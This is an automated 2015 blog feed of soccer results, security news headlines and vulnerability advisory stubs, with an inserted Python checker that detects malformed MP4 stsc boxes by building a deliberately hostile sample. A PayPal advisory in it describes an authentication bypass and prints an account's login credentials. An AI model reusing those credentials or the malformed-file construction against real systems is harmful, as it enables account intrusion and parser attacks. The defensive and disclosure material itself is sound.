Saturday, September 12, 2015

Porto wins 3-1 at Arouca in Portugal

LISBON, Portugal (AP) FC Porto eased to a 3-1 win at Arouca to sit atop the Portuguese league on Saturday.

from FOX Sports Digital http://ift.tt/1Ome54E
via IFTTT

South American football chief backs Copa Centenario in US

MIAMI BEACH, Fla. (AP) The host confederation for next year's Copa America Centenario in the United States still hopes the tournament can be played despite the indictment of nine soccer officials and five businessmen on corruption charges.

from FOX Sports Digital http://ift.tt/1FEufiJ
via IFTTT

Twente and Ajax draw 2-2, PSV thrashes Cambuur 6-0

AMSTERDAM (AP) Ajax's perfect start to the Eredivise ended on Saturday as it drew 2-2 at struggling FC Twente, while defending champion PSV Eindhoven thrashed 10-man Cambuur Leeuwarden 6-0.

from FOX Sports Digital http://ift.tt/1LqmTkC
via IFTTT

I have a new follower on Twitter


InXpress
Dramatically reduce your international shipping costs with InXpress's consolidated shipping volume from thousands of businesses under one umbrella.
Scottsdale Arizona
http://t.co/YTtuvZgDxF
Following: 1939 - Followers: 1288

September 12, 2015 at 05:20PM via Twitter http://twitter.com/DHL_Discounts

Olympiakos remains unbeaten in Greece, beats Platanias 3-1

ATHENS, Greece (AP) Defending champion Olympiakos upheld its perfect start to the Greek league by beating visiting Platanias 3-1 for a third straight win on Saturday.

from FOX Sports Digital http://ift.tt/1EUreQm
via IFTTT

InXpress (@DHL_Discounts) favorited one of your Tweets!

@mistermcguire: [FD] Shopify Bug Bounty #8 - (FilePath) Persistent Vulnerability ift.tt/1FBgXDE
InXpress favorited your Tweet (Patrick McGuire, @mistermcguire).

Source: Gmail -> IFTTT-> Blogger

Young migrants applauded by 75,000 fans at Bundesliga game

MUNICH (AP) Young migrants accompanied Bayern Munich players onto the pitch and took center stage to the applause of 75,000 fans before a Bundesliga game on Saturday.

from FOX Sports Digital http://ift.tt/1Kidq2w
via IFTTT

Roma wins 2-0 at Frosinone to move top in Italy

MILAN (AP) Roma provisionally moved top of the Serie A table with a 2-0 win at local rival Frosinone on Saturday, while 10-man Fiorentina beat Genoa 1-0.

from FOX Sports Digital http://ift.tt/1UOoHZV
via IFTTT

These Top 30 Ashley Madison Passwords are just as Terrible as You'd Think

Yes, you heard it correctly! First the password-cracking team 'CynoSure Prime' cracked more than 11 million Ashley Madison passwords in just 10 days (quite an achievement), and now a member of the team has shared the same list of passwords along with a few calculations. The calculations answer: which passwords are used most, and by how many users? Terrible? Out of 11


from The Hacker News http://ift.tt/1VU5Sqr
via IFTTT

Man City leaves it late to beat Palace 1-0 in Premier League

LONDON (AP) Manchester City maintained its perfect start to the season after a 90th-minute goal from Kelechi Iheanacho earned the Premier League leaders a 1-0 victory at Crystal Palace on Saturday.

from FOX Sports Digital http://ift.tt/1J4Kx4l
via IFTTT

Ronaldo hits 5 goals to become Madrid's top scorer in Liga

BARCELONA, Spain (AP) Cristiano Ronaldo scored five goals to become Real Madrid's all-time leading scorer in the Spanish league in a 6-0 rout at Espanyol on Saturday.

from FOX Sports Digital http://ift.tt/1UKLF9u
via IFTTT

Apple Boosts iOS 9 Security with improved Two-Factor Authentication

Apple iOS 9, codenamed Monarch, will be available to the world on September 16th. While most of the upgrades in iOS 9 focus on making devices faster, smarter, more secure and more efficient, today we are going to discuss the improved Two-Factor Authentication (2FA) built into the new iOS operating system. WHAT'S NEW AND HOW IT WORKS Apple has strengthened the foundation of iOS 9


from The Hacker News http://ift.tt/1Lq7jpp
via IFTTT

Lyon misses chances in 0-0 draw against resilient Lille

PARIS (AP) Lyon missed the chance to move into provisional second place in the French league after drawing 0-0 against a resilient Lille on Saturday.

from FOX Sports Digital http://ift.tt/1OKt5Hu
via IFTTT

City strikes late after Chelsea slips up in Premier League

LONDON (AP) Manchester City needed a 90th minute winner to beat Crystal Palace 1-0 and secure a fifth consecutive victory this season, while Premier League champion Chelsea slumped to a 3-1 defeat at Everton on a day of contrasts for title hopefuls.

from FOX Sports Digital http://ift.tt/1O7vij9
via IFTTT

Arsenal beats Stoke 2-0 in Premier League

LONDON (AP) Arsenal strikers Theo Walcott and Olivier Giroud scored a goal each Saturday in a 2-0 win over Stoke in the Premier League that still highlighted the team's inefficiency in attack.

from FOX Sports Digital http://ift.tt/1K3oRrl
via IFTTT

Berahino goalless on West Brom return in Southampton draw

WEST BROMWICH, England (AP) Saido Berahino could not find the net on his return for West Bromwich Albion in a dire 0-0 draw with Southampton in the English Premier League on Saturday.

from FOX Sports Digital http://ift.tt/1NorUie
via IFTTT

Watford beats Swansea 1-0 for 1st league win of season

WATFORD, England (AP) Newly promoted Watford won its first Premier League match of the season, beating Swansea 1-0 on Saturday despite being reduced to 10 men.

from FOX Sports Digital http://ift.tt/1K3oUn1
via IFTTT

Ronaldo scores 5 goals as Madrid routs Espanyol 6-0

BARCELONA, Spain (AP) Cristiano Ronaldo scored five goals for Real Madrid for the second time in a 6-0 rout of Espanyol in the Spanish league on Saturday.

from FOX Sports Digital http://ift.tt/1K5c7Tf
via IFTTT

Bayern beats Augsburg 2-1 last minute, Dortmund wins 4-2

MUNICH (AP) Thomas Mueller scored a last-minute penalty for Bayern Munich to beat Augsburg 2-1 and Borussia Dortmund maintained its perfect Bundesliga start by defeating Hannover 4-2 on Saturday.

from FOX Sports Digital http://ift.tt/1OKeXOp
via IFTTT

Young migrants applauded by 75,000 fans before German game

MUNICH (AP) Young migrants accompanied Bayern Munich players onto the pitch and were applauded by 75,000 fans before a Bundesliga game Saturday.

from FOX Sports Digital http://ift.tt/1O7kZM0
via IFTTT

Russia's slowest WCup stadium starts construction

MOSCOW (AP) Construction has finally started on the most delayed of Russia's stadiums for the 2018 World Cup.

from FOX Sports Digital http://ift.tt/1ilG0G2
via IFTTT

Zenit rescues draw against Russian leader CSKA

MOSCOW (AP) Hulk scored as Zenit St. Petersburg bounced back from two goals down to draw 2-2 with leader CSKA Moscow in the Russian Premier League on Saturday.

from FOX Sports Digital http://ift.tt/1K4UQcK
via IFTTT

Hiroshima beats Yamagata 3-1 to take over J-League lead

TOKYO (AP) Brazilian Douglas and Takuma Asano scored second-half goals as Sanfrecce Hiroshima beat Montedio Yamagata 3-1 on Saturday to move into first place in the J-League second stage standings.

from FOX Sports Digital http://ift.tt/1O7a1WF
via IFTTT

LockerPin Ransomware Resets PIN and Permanently Locks Your SmartPhones

Your device's lock screen PIN is believed to keep your phone's contents safe from others, but sadly not from a new piece of ransomware that is capable of hijacking the security of your Android device. A group of security researchers has uncovered what is believed to be the first real example of malware that is capable of resetting the PIN code on a device and permanently locking the owner out of their


from The Hacker News http://ift.tt/1J4vV4Y
via IFTTT

'Gladbach captain Stranzl out 6-8 weeks with facial injury

MOENCHENGLADBACH, Germany (AP) Borussia Moenchengladbach captain Martin Stranzl has undergone an operation on his fractured eye socket and will be ruled out for six to eight weeks.

from FOX Sports Digital http://ift.tt/1M3JHtr
via IFTTT

Here's How to Stop Windows 7 or 8 from Downloading Windows 10 Automatically

Yesterday we reported that Microsoft is auto-downloading Windows 10 installation files — between 3.5GB and 6GB — onto users' PCs even if they have not opted into the upgrade. Microsoft plans to deploy Windows 10 on over 1 billion devices worldwide, and this auto-downloading of Windows 10 could be one of its many strategies to achieve that goal. The company has dropped and saved a hidden


from The Hacker News http://ift.tt/1UJFL8K
via IFTTT

DESIGNATED RIGHT TURN LANES TO IMPROVE TRAFFIC FLOW.

With very over crowded San Pedro and Wilmington streets a very low cost and effective way to improve the traffic flow throughout the region is to ...

from Google Alert - anonymous http://ift.tt/1Khc2Ny
via IFTTT

A Giant Squid in the Flying Bat


Very faint but also very large on planet Earth's sky, a giant Squid Nebula cataloged as Ou4, and Sh2-129 also known as the Flying Bat Nebula, are both caught in this scene toward the royal constellation Cepheus. Composed with a total of 20 hours of broadband and narrowband data, the telescopic field of view is almost 4 degrees or 8 Full Moons across. Discovered in 2011 by French astro-imager Nicolas Outters, the Squid Nebula's alluring bipolar shape is distinguished here by the telltale blue-green emission from doubly ionized oxygen atoms. Though apparently completely surrounded by the reddish hydrogen emission region Sh2-129, the true distance and nature of the Squid Nebula have been difficult to determine. Still, a recent investigation suggests Ou4 really does lie within Sh2-129 some 2,300 light-years away. Consistent with that scenario, Ou4 would represent a spectacular outflow driven by a triple system of hot, massive stars, cataloged as HR8119, seen near the center of the nebula. If so, the truly giant Squid Nebula would physically be nearly 50 light-years across. via NASA http://ift.tt/1NlcUBL

Orioles Highlight: Baltimore hits 2 grand slams in the 8th inning en route to a 14-8 win over the Royals (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Friday, September 11, 2015

[FD] Defense in depth -- the Microsoft way (part 33): arbitrary code execution (and UAC bypass) via RegEdit.exe

Re: [FD] OpenLDAP ber_get_next Denial of Service

Why are they labelling this 'minor' and not issuing a fix? I could use the oneliner in this advisory to kill the vanilla OpenLDAP on my Ubuntu box. Remotely. A remote unauthenticated DoS against a directory server is /not/ minor, IMHO.

On 10-09-15 07:34, Denis Andzakovic wrote:
> [ASCII-art banner]
>
> presents..
> OpenLDAP ber_get_next Denial of Service
> Affected Versions: OpenLDAP <= 2.4.42
>
> PDF: http://ift.tt/1EZRMzx

Source: Gmail -> IFTTT-> Blogger

4th loss in 4 games for 'Gladbach after 3-0 loss to Hamburg

MUNICH (AP) Borussia Moenchengladbach's miserable start to the season continued Friday as Pierre-Michel Lasogga led visiting Hamburg to a 3-0 win in the Bundesliga.

from FOX Sports Digital http://ift.tt/1Lot34M
via IFTTT

South American football chief backs Copa Centenario in US

ASUNCION, Paraguay (AP) The head of South American soccer governing body CONMEBOL tells The Associated Press he backs playing the Copa America's 100th anniversary tournament next year in the United States.

from FOX Sports Digital http://ift.tt/1iD2lyG
via IFTTT

Redirect anonymous users to login when trying to view profile

Accordingly, anonymous users receive the standard warning when trying to view a profile: Sorry but we are not able to provide this at the moment.

from Google Alert - anonymous http://ift.tt/1Qtrbw0
via IFTTT

Premier League clubs to support migrant appeals

LONDON (AP) Premier League clubs will promote a child refugee crisis appeal run by leading charity Save the Children this weekend, while Arsenal will donate one pound ($1.5) from each ticket sold in a response to the migrant crisis from top-flight English teams.

from FOX Sports Digital http://ift.tt/1UHVhlv
via IFTTT

Swiss league pledges cash for goals to refugees charity

BERN, Switzerland (AP) Each goal scored in top Swiss league matches this weekend will earn 500 Swiss francs ($513) for a charity working with refugees.

from FOX Sports Digital http://ift.tt/1FC3yuT
via IFTTT

plone/Products.CMFPlone

Fields related with anonymous users should be side by side #948. Open. hvelarde opened this Issue 24 minutes ago · 1 comment ...

from Google Alert - anonymous http://ift.tt/1UHCUgo
via IFTTT

UEFA adds steroid monitoring to anti-doping program

NYON, Switzerland (AP) UEFA says it has added monitoring of steroid use by players to its biological passport program this season.

from FOX Sports Digital http://ift.tt/1KfCYNG
via IFTTT

Microsoft is Auto-Downloading Windows 10 to PCs, Even If You Don't Want it

Microsoft wholeheartedly wants you to upgrade to Windows 10. So much so that even if you have not opted in to the Windows 10 upgrade, you will get it anyway. Surprised? If you have Windows Update enabled on a PC running Windows 7 or Windows 8.1, you'll notice that a large file — between 3.5GB and 6GB — has mysteriously been downloaded to your computer in the background. The huge file


from The Hacker News http://ift.tt/1LnVCiJ
via IFTTT

Slowed by injuries, Giuseppe Rossi agrees to reduce salary

FLORENCE, Italy (AP) After returning from the latest in a series of serious knee injuries, United States-born Italy international Giuseppe Rossi has agreed to reduce his salary at Fiorentina.

from FOX Sports Digital http://ift.tt/1OGRv4M
via IFTTT

Barcelona includes Messi for Atletico match, Pique ruled out

MADRID (AP) Barcelona coach Luis Enrique will be able to count on his first-choice attacking lineup of Lionel Messi, Neymar and Luis Suarez for Saturday's match against Atletico Madrid.

from FOX Sports Digital http://ift.tt/1gf0lKU
via IFTTT

Wolfsburg inviting 1,200 migrants to Champions League game

WOLFSBURG, Germany (AP) Bundesliga runner-up Wolfsburg says it will invite about 1,200 migrants to its opening Champions League game against CSKA Moscow on Tuesday.

from FOX Sports Digital http://ift.tt/1Nm21j9
via IFTTT

Android Stagefright Exploit Code Released

Zimperium Mobile Security Labs (zLabs) have been working hard to make the Android operating system safer and more secure to use. The Zimperium team has publicly released the CVE-2015-1538 Stagefright exploit, demonstrating the process of Remote Code Execution (RCE) by an attacker. The released exploit is Python code that creates an MP4 file exploiting the 'stsc' vulnerability dubbed Stagefright.


from The Hacker News http://ift.tt/1ULiMos
via IFTTT
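The post above says the released exploit is an MP4 file built around the 'stsc' (sample-to-chunk) atom. The checker below is an added example, not Zimperium's exploit code or any libstagefright source: it walks the ISO base media file format box tree (moov/trak/mdia/minf/stbl) and flags any stsc box whose declared entry_count does not match the bytes actually present, which is exactly the kind of count-vs-size inconsistency a parser must verify before it multiplies the count into an allocation size. The two inputs are constructed in the code and labelled as such; it is an assumption, not something the page states, that the published sample carries an oversized entry_count rather than some other malformation.

```python
import struct

# Container boxes we descend into to reach the sample table (ISO/IEC 14496-12 box hierarchy).
CONTAINER_BOXES = {b"moov", b"trak", b"mdia", b"minf", b"stbl"}
STSC_ENTRY_SIZE = 12  # first_chunk, samples_per_chunk, sample_description_index: three uint32


def iter_boxes(data, start, end):
    """Yield (type, payload_start, payload_end) for each box in data[start:end]."""
    pos = start
    while pos + 8 <= end:
        size, box_type = struct.unpack(">I4s", data[pos:pos + 8])
        header = 8
        if size == 1:  # 64-bit largesize follows the type field
            if pos + 16 > end:
                raise ValueError("truncated largesize header")
            size = struct.unpack(">Q", data[pos + 8:pos + 16])[0]
            header = 16
        elif size == 0:  # box runs to the end of the enclosing region
            size = end - pos
        if size < header or pos + size > end:
            raise ValueError(f"box {box_type!r} at {pos} claims {size} bytes, only {end - pos} available")
        yield box_type, pos + header, pos + size
        pos += size


def check_stsc(data, payload_start, payload_end):
    """Return the problems found in one stsc payload; an empty list means it is consistent."""
    problems = []
    avail = payload_end - payload_start
    if avail < 8:
        return [f"stsc payload too short ({avail} bytes)"]
    _version_flags, entry_count = struct.unpack(">II", data[payload_start:payload_start + 8])
    declared = entry_count * STSC_ENTRY_SIZE  # Python ints do not wrap; a 32-bit C multiply would
    actual = avail - 8
    if declared != actual:
        problems.append(f"entry_count={entry_count} needs {declared} bytes but box carries {actual}")
    # Only inspect entries that are physically present, whatever entry_count claims.
    prev_first_chunk = 0
    for i in range(min(entry_count, actual // STSC_ENTRY_SIZE)):
        off = payload_start + 8 + i * STSC_ENTRY_SIZE
        first_chunk, samples_per_chunk, sdi = struct.unpack(">III", data[off:off + STSC_ENTRY_SIZE])
        if first_chunk <= prev_first_chunk or samples_per_chunk == 0 or sdi == 0:
            problems.append(f"entry {i} malformed: first_chunk={first_chunk} "
                            f"samples_per_chunk={samples_per_chunk} sdi={sdi}")
        prev_first_chunk = first_chunk
    return problems


def scan_mp4(data):
    """Walk the whole box tree and collect every stsc or framing problem in the file."""
    problems = []
    stack = [(0, len(data))]
    while stack:
        start, end = stack.pop()
        try:
            for box_type, p_start, p_end in iter_boxes(data, start, end):
                if box_type in CONTAINER_BOXES:
                    stack.append((p_start, p_end))
                elif box_type == b"stsc":
                    problems.extend(check_stsc(data, p_start, p_end))
        except ValueError as exc:  # a box header that lies about its size is itself a finding
            problems.append(str(exc))
    return problems


def box(box_type, payload):
    """Build a box with a 32-bit size header (helper for the constructed samples below)."""
    return struct.pack(">I4s", 8 + len(payload), box_type) + payload


def build_sample(entry_count, entries):
    """Constructed minimal MP4 (ftyp + moov/trak/mdia/minf/stbl/stsc); not a playable file."""
    stsc_payload = struct.pack(">II", 0, entry_count) + b"".join(struct.pack(">III", *e) for e in entries)
    stbl = box(b"stbl", box(b"stsc", stsc_payload))
    moov = box(b"moov", box(b"trak", box(b"mdia", box(b"minf", stbl))))
    return box(b"ftyp", b"isom" + b"\x00\x00\x02\x00" + b"isom") + moov


# Constructed inputs: a consistent stsc, and one whose entry_count far exceeds the data present.
BENIGN_MP4 = build_sample(2, [(1, 4, 1), (5, 2, 1)])
HOSTILE_MP4 = build_sample(0xFFFFFFFF, [(1, 4, 1)])

if __name__ == "__main__":
    print("benign :", scan_mp4(BENIGN_MP4))
    print("hostile:", scan_mp4(HOSTILE_MP4))
```

The check is deliberately done in arbitrary-precision arithmetic and against the enclosing box size; a parser that trusts entry_count and computes `entry_count * 12` in a 32-bit integer is the pattern that turns a hostile count into an undersized allocation.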

Czech defender Limbersky loses club captaincy after crash

PRAGUE (AP) Czech Republic defender David Limbersky was stripped of the captaincy of Viktoria Plzen on Friday, a day after he allegedly drove into a fence in Prague and tried to flee.

from FOX Sports Digital http://ift.tt/1K0qJkr
via IFTTT

FIFA probes complaint into Chelsea loan of Salah to Roma

ZURICH (AP) FIFA is investigating Mohamed Salah's move to Roma in a breach of contract case which could threaten Chelsea with a transfer ban.

from FOX Sports Digital http://ift.tt/1K0qJkn
via IFTTT

De Gea in spotlight as Man United faces Liverpool

LONDON (AP) After the failed move to Real Madrid, goalkeeper David De Gea is finally set to make his first appearance of the season for Manchester United on Saturday against old rival Liverpool.

from FOX Sports Digital http://ift.tt/1ULfn9a
via IFTTT

ISS Daily Summary Report – 09/10/15

Human Research Program (HRP) Operations: Salivary Markers: Yui collected saliva and urine samples in support of his FD 90 Salivary Markers and inserted them into MELFI. Salivary Markers samples will be used to measure markers of latent viral reactivation (a global indicator of immune impairment and infection risk) in conjunction with salivary antimicrobial proteins and immune cell functional assays. This research study will help identify if there are any risks of an adverse health event in crewmembers due to an impaired immune system. Maintaining a robust immune system during prolonged spaceflight missions (i.e., to other planets or asteroids) will be important to ensure mission success. If any impairment in immunity is found due to spaceflight, this will allow the development of appropriate countermeasures to help mitigate the risks. Synchronized Position Hold, Engage, Reorient, Experimental Satellites (SPHERES) Slosh: Kelly performed the third SPHERES Slosh session of Increment 43/44. With assistance from ground teams, Kelly followed the uplinked test plan and worked through eight different objectives. Lindgren set up and recorded the sessions using both the IMAX and 3DA1 cameras. The SPHERES-Slosh investigation uses small robotic satellites to examine how liquids move around inside containers in microgravity. A water bottle's contents slosh around differently in space than on Earth, but the physics of liquid motion in microgravity are not well understood, which affects computer simulations of liquid rocket fuel behavior. Middle school and high school students control the SPHERES to study how liquids behave inside containers in space, which increases the safety and efficiency of future rockets. Ryutai Reconfiguration: Yui reconfigured the Solution Crystallization Observation Facility (SCOF) within the Ryutai rack in preparation for the next session of Soret Facet scheduled for Increment 45.
The Soret effect in fluids is a thermodynamic phenomenon in which different particles respond in different ways to varying temperatures. The effect, studied by the Swiss chemist Charles Soret, has been difficult to examine in detail on Earth because of gravity. The Study on Soret effect (thermal diffusion process) for the mixed solution by the in-situ observation technique facilitated at SCOF (Soret-Facet) is the first investigation to verify Soret conditions in steady and changing conditions, and to compare the Soret effect in microgravity with results on the ground, an important measurement for calibrating future investigations. Node 3 Carbon Dioxide Removal Assembly (CDRA) Anomaly: Yesterday evening, the Node 3 CDRA pump experienced an anomaly at the beginning of segment 2 during Half Cycle 2. This anomaly had been seen before in February of this year. Ground teams power cycled the Pump/Fan Motor Controller (PFMC) in order to recover from the problem. At this time Node 3 and Lab CDRAs are operating nominally and CO2 levels are within acceptable limits. ESA Short Duration Mission Muscle Atrophy Research and Exercise System (MARES): Commissioning Day #2 is complete and the hardware has been restowed. The team experienced issues with LAN cable connectivity between the EPM laptop and the MARES Main Box, and with end-stop over-travel detection during the use of PEMS and EMG. MARES is a physiological research facility that will be used to carry out research on musculoskeletal, biomechanical, and neuromuscular human physiology. Commissioning Part #2 is the last step in this research rack's check-out activities. Its main goal is the performance of an integrated man-in-the-loop technical protocol which characterizes all MARES subsystems and associated auxiliary measurement devices (ultrasound, electrical muscle stimulation and electromyogram). MELONDAU: yesterday DEMES tasting session #5 was completed nominally; session #6 (the final session) was completed earlier today.
Current status of MCA/AQM measurements:
- MCA measurements have been received by BIOTESC for GMT 248 to 250; GMT 251 files are pending.
- AQM: confirmed that we have NO measurements for either GMT 248 or 249. For GMT 250, some files were acquired with AQM in speed mode (rather than autorun mode). For GMT 251, the same speed mode was used.
Long-distance and long-term human space travel will only be possible with adequate life support systems in place, allowing extensive recycling of water and the in situ production of oxygen and food, with closed regenerative systems the most ideal way of reducing launch mass and costs. MELONDAU is a significant precursor flight experiment which will verify the recovery of biological processes of selected micro-organisms, test a microfluid system essential for the overall monitoring and control of a closed regenerative life support system, and verify the acceptability of snacks composed of Micro-Ecological Life Support System Alternative (MELiSSA) ingredients. This is a first step to enable the successful deployment of ESA's MELiSSA system in space in the future. MOBI-PV: yesterday, Mogensen unstowed the MOBI-PV equipment. A missing USB adapter cable was found later in the day, and all the planned MOBI-PV activities (i.e. smartphone battery charging) could be completed. The current ISS laptop-based crew information system has certain drawbacks with respect to operator mobility and user interface options. The mobiPV experiment will demonstrate new technologies and operations concepts for ISS crew procedure execution, both for onboard crew and ground teams, offering wireless operation, voice navigation and real-time (over the shoulder) video streaming of workplace activities and synchronized in-flight/on-ground procedure execution. The mobiPV system could be deployed for future crew procedures and contingency operations with a potential to significantly shorten anomaly processing and resolution.
EPO IrISS: Mogensen completed three EPO scripts from the Cupola.  The need for education in an ever‐increasing knowledge based society is without question and education forms a fundamental part of the mandate of the European Space Agency (ESA). The EPO IrISS set of education activities aims to introduce the concept of microgravity and human spaceflight to European children and students ranging from primary to tertiary level education. The activities related to this project are intended to stimulate the curiosity of students and to motivate them towards STEM (Science, Technology, Engineering and Mathematics) subjects as well as to bring awareness to the younger generation of the importance of the ISS as a testing bed for future exploration activities in space.   ENDOTHELIAL CELLS: KUBIK FM5 […]

from ISS On-Orbit Status Report http://ift.tt/1Ntmowr
via IFTTT

AP Photos: 2018 World Cup host Russia looks for future stars

MOSCOW (AP) As Russia prepares to host the 2018 World Cup, it is already looking to a future generation of soccer stars.

from FOX Sports Digital http://ift.tt/1Mge8Q1
via IFTTT

[FD] [KIS-2015-04] Magento <= 1.9.2 (catalogProductCreate) Autoloaded File Inclusion Vulnerability

Source: Gmail -> IFTTT-> Blogger

Health Insurer Excellus Hacked; 10.5 Million Records Breached

Health care hacks: the choice of hackers this year! In a delayed revelation, Excellus BlueCross BlueShield (BCBS) says that the data and information of about 10.5 million of its clients has been compromised by hackers. Excellus BCBS, headquartered in Rochester, New York, provides finance and health care services across upstate New York and long-term care insurance nationwide.


from The Hacker News http://ift.tt/1FBcOzq
via IFTTT

[FD] PayPal Inc - Security Approval & 2FA Session Auth Bypass (API) Vulnerability

Document Title:
===============
PayPal Inc - Security Approval & 2FA Session Auth Bypass (API) Vulnerability

References (Source):
====================
http://ift.tt/1JBcftp
Video: http://ift.tt/1Krnzf9
Watch Video: https://www.youtube.com/watch?v=Gzq8TD2Co9Y
EIBBP-31865
Vulnerability Magazine: http://ift.tt/1KrpSig
http://ift.tt/1O2mJoS http://ift.tt/1K2cZsM http://ift.tt/1iBXCgz http://ift.tt/1EOHMcn http://ift.tt/1iBXCgB...

Release Date:
=============
2015-09-02

Vulnerability Laboratory ID (VL-ID):
====================================
1486

Common Vulnerability Scoring System:
====================================
6.1

Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (it can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow Chinese consumers to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
(Copy of the Homepage: www.paypal.com) [http://ift.tt/rooU27]

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a restriction filter bypass in the official PayPal Inc Mobile API for Apple iOS.

Vulnerability Disclosure Timeline:
==================================
2015-04-30: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2015-05-02: Vendor Notification (PayPal Inc - Security & Bug Bounty Team)
2015-05-13: Vendor Response/Feedback (PayPal Inc - Security & Bug Bounty Team)
2015-**-**: Vendor Fix/Patch (PayPal Inc - Developer Team)
2015-09-02: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
PayPal Inc
Product: Mobile Web Application (API) 2015 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
While processing multiple logins we found a bug in the mobile app API next to the identity check. Normally a user account logs in and, if the account is restricted, a form pops up after several requests asking the user to call PayPal or write a ticket mail. By requesting the form multiple times with an existing account (x01445@gmail.com:chaos666) we were able to bypass the authentication verification check that approves the account owner. The API loads the website context, and the user is able to load their own account inside the identity check with a browser engine. Even if the account is restricted, the user can access it via the mobile API with the existing cookies. The security identity check has been included to verify that no user logs in to unauthorized or restricted accounts. In the video we demonstrate how we bypass the validation and how the final request should normally look.

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with a low-privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below to continue.
The video demonstrates a flaw inside the mobile app API that redirects a user account with restricted credentials inside the app to the original website source. The cookies authorize the account to log in even if the regular portal denies it because of the identity approval. The issue is not connected to the restriction bypass reported 6 months ago and reveals a significant risk to user accounts because of fraud and account theft. The video demonstrates a security bug in the official PayPal mobile iOS API. The bug allows bypassing the account restriction by use of a validation flaw inside the service. The identity check approves restricted user accounts. In the first released issue we demonstrated how to bypass the authentication. In the new issue the researcher demonstrates how to bypass the identity check that approves the PayPal account. The attacker bypasses the validation by multiple requests and dumps the real website for login inside the app, with cookies and so on.
Video Demonstration: https://www.youtube.com/watch?v=Gzq8TD2Co9Y

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure redirect of a multi-requesting source to the main mobile API. Disallow loading the website context with the app cookies after a successful login through a restricted account.

Security Risk:
==============
The security risk of the remote mobile API identity approval check bypass is estimated as high. (CVSS 6.1)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [http://ift.tt/1jnqRwA]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose.
Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] Magento Bug Bounty #19 - Persistent Filename Vulnerability

Document Title:
===============
Magento Bug Bounty #19 - Persistent Filename Vulnerability

References (Source):
====================
http://ift.tt/1F14u0T

ID: APPSEC-1059

Release Date:
=============
2015-09-11

Vulnerability Laboratory ID (VL-ID):
====================================
1570

Common Vulnerability Scoring System:
====================================
3.9

Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from programmers in the open source community, but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.

Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://ift.tt/1E22539 )

Abstract Advisory Information:
==============================
